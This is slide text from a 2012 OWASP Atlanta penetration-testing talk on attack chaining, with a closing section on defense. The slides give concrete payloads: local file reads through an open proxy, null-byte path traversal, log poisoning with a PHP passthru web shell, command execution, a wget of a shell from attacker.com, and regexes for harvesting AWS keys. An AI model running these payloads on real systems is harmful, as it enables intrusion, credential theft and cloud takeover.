The document outlines advanced attack chaining techniques for penetration testing, demonstrating a step-by-step process of exploiting vulnerabilities in web applications and cloud infrastructures. It emphasizes the risks associated with insecure configurations, exposure of sensitive information, and the potential consequences of such breaches, particularly on Amazon AWS services. Key strategies for prevention and improvement, including the implementation of defense-in-depth and strategic security policies, are also discussed.

1. Attack Chaining
Advanced Maneuvers for Hack Fu
OWASP ATL
31 May 2012

2. About Us
WHO ARE THES DUDES?
• Rob • Oscar
Sr. Security Associate Security Associate
@ Stach & Liu @ Stach & Liu
2

3. Penetration Test
vs.
Vulnerability Assessment
3

4. vs.
4

5. Simulate a real world
attack against a
target network or
application.
- EVERYBODY
5

6. It answers the
question, “could
someone break in?”
6

7. Penetration Testing
Exploit &
Penetrate
Information
Gathering
2
3
Escalate
Privileges
1
Maintain 4a
4b
Access
Deny Access

8. Pen Testing Scenario
• Web application penetration test
• Cloud-based infrastructure hosts multiple
sites
• Out-sourced PHP development to many
contractors
• Determine attackers ability to
compromise PII or infrastructure
8

9. Step 1 – Explore
9

10. Step 2 – Read Code
http://vuln.com/dir/share.js
...
AJAX.Call({ method:’POST’, url:’include/s_proxy.php’
...
10

11. Step 3 – Proxy?
http://vuln.com/dir/include/s_proxy.php?
redirect_url=http://www.google.com
11

12. Step 4 – Read Local Files!
http://vuln.com/dir/include/s_proxy.php?
redirect_url=file:///etc/passwd
12

13. Attack Chaining – Maneuver 1
13

14. Attack Chaining – Maneuver 1
14

15. Step 5 – Gather More Info
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/conf/httpd.conf
15

16. Step 6 – Keep Going…
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/conf/virtual.conf
16

17. Step 6 – Keep Going…
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/conf/virtual.conf
VirtualHost *
ServerName vuln.com
DocumentRoot /var/www/sites/vuln.com/docroot
ErrorLog logs/vuln.com_error_log
/VirtualHost
17

18. Step 7 – Back to DirBuster
18

19. Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///var/www/sites/vuln.com/
docroot/dir/include/controller.php
19

20. Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///var/www/sites/vuln.com/
docroot/dir/include/controller.php
?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] :
$config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] :
$config['action'];
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile)
exit;
?
20

21. Attack Chaining – Maneuver 2
21

22. Attack Chaining – Maneuver 2
22

23. Step 9 – Null Byte Injection
http://vuln.com/dir/include/controller.php
?module=../../../../../../etc/passwd%00
23

24. Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///var/www/sites/vuln.com/
docroot/dir/include/controller.php
?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] :
$config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] :
$config['action'];
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile)
exit;
?
24

25. Step 10 – Review Gathered Info
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/conf/virtual.conf
25

26. Step 10 – Back to Virtual Conf
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/conf/virtual.conf
VirtualHost *
ServerName vuln.com
DocumentRoot /var/www/sites/vuln.com/docroot
ErrorLog logs/vuln.com_error_log
/VirtualHost
26

27. Step 11 – Where To Stick It?
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/logs/vuln.com_
error_log
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat.jpg, referer:
http://www.vuln.com/
27

28. Step 12 – Poison Logs
28

29. Step 12 – Poison Logs
29

30. Step 12 – Poison Logs
?
echo 'pre';
passthru($_GET['cmd']);
echo '/pre';
?
30

31. Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/logs/vuln.com_
error_log
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat.jpg,
referer: http://www.vuln.com/
31

32. Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php
?redirect_url=file:///etc/httpd/logs/vuln.com_
error_log
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat.jpg,
referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist:
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat-attack.jpg,
referer: ? echo 'pre';passthru(
$_GET['cmd']);echo 'pre'; ?
32

33. Step 14 – Execute Code
http://vuln.com/dir/include/controller.php
?module=/../../../../../../../../etc/httpd/
logs/vuln.com_error_log%00cmd=ls;
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat-attack.jpg, referer:
controller.php
example.php
includes
modules
phpinfo.php
…
33

34. Step 14 – Execute Code
?
echo 'pre';
passthru('ls');
echo '/pre';
?
/var/www/sites/vuln.com/docroot/wp-content/themes/
lulzcat-attack.jpg, referer:
controller.php
example.php
includes
modules
phpinfo.php
…
34

35. Attack Chaining – Maneuver 3
35

36. Attack Chaining – Maneuver 3
36

37. Step 15 – Upload Shell
http://vuln.com/dir/include/controller.php
?module=/../../../../../../../../etc/httpd/
logs/vuln.com_error_log%00cmd=wget%20http://
attacker.com/gny.php;
37

38. Step 16 – Enjoy!
38

39. Step 17 – I
want
more!
ec2[^d]['][A-Z0-9]{20}[']
ec2.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}[']
ec2.*['][A-Z0-9]{20}[']
ec2(D)*['][A-Z0-9]{20}[']
amazon.*['][A-Z0-9]{20}[']
(amazon|ec2).*['][A-Z0-9]{20}[']
amazon(D)*['][A-Z0-9]{20}[']
access secret ['][A-Z0-9]{20}['] [A-Za-z0-9+/]{40}
amazon.*['][A-Z0-9]{20}['].*['][A-Za-z0-9+/]{40}[']
aws.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}[']
amazon.*['][A-Z0-9]{20}['] ['][A-Za-z0-9+/]{40}[']
secret.*['][A-Za-z0-9+/]{40}[']
['][A-Za-z0-9+/]{40}['].*amazon
39

40. Step 18 – Amazon
AWS
Regex
$this-­‐amazonService
=
new
Zend_Service_Amazon('DB3BAD768F2F11C7628',
$aws_key
=
'8AFB5AF55D1E6620EE1';
define('AMAZON_KEY',
'372B8E408D1484C538F');
if
(!defined('awsAccessKey'))
define('awsAccessKey',
'9F6EB7471C926194884');
//if
(!defined('awsAccessKey'))
define('awsAccessKey',
'4CAD89B86344CD8C26C');
define('AMAZON_AES_ACCESS_KEY_ID',
'95C95B8DC84AA24C0EC');
40

41. Step 19 – AWS
Takeover
41

42. Step 20 – Make
It
Your
Own
42

43. Cost of Amazon Cloud Compromise
CRI TICAL EXPOSURE
1. Found 8 Amazon Secret Keys to access Amazon S3
2. Found that 2 of the 8 have administrator access to
Amazon EC2
3. Attacker launches 100 Extra Large Clusters
$1,049,000
43

44. Take Them Off The Web
CRI TICAL EXPOSURE
1. Found 8 Amazon Secret Keys to access Amazon S3
2. Found that 2 of the 8 have administrator access to
Amazon EC2
3. Attacker shuts down and deletes all servers and
backups permanently
PRICELESS 44

45. Attack Chaining – Hack Fu
45

46. Attack Chaining – Hack Fu
46

47. Why Is This Happening?
1. Local File Include 4. Insecure Credential
• File Read Only Storage
• Code Execution 5. Overly Permissive
2. Null Byte Injection Amazon AWS Keys
3. Log Poisoning 6. Sensitive Information
Disclosure
47

48. Web à Mass Malware Deployment
48

49. Web à Data Center Compromise
49

50. Web à Internal Network Compromise
50

51. Internal Assessmentà SSN Bank #’s
51

52. Infrastructure Review
52

53. Step 1 – Target Wireless
53

54. Step 1 – Target Wireless
54

55. Step 2 – Port Scan
55

56. Step 3 – Test Default Creds
56

57. Infrastructure Apocalypse
57

58. Step 4 – Control AP
58

59. Step 5 – Read All E-mail
59

60. Step 6 – Listen To VOIP
60

61. Step 7 – Open All Doors
61

62. Step 7 – Open All Doors
62

63. 63

64. Step 7 – Server Room Door
64

65. Is This Real Life?
1. Insecure Wireless 4. Weak Passwords
Encryption 5. Sensitive Information
2. Improper Network Disclosure
Segmentation
3. Insecure Default
Configuration
65

66. Protection – How?
1. People
2. Policy
3. Processes
4. Strategic / Tactical
Security
5. Defense In-Depth
66

67. Defense In-Depth
I S P R O T E C T I O N A G A I N S T. . .
67

68. How Do You Get Better?
68

69. Synthesis and Patterns
CAN BE BOTH GOOD AND BAD
69

70. Attack Visualization
LIKE BOBBY FISCHER
70

72. Thank You
72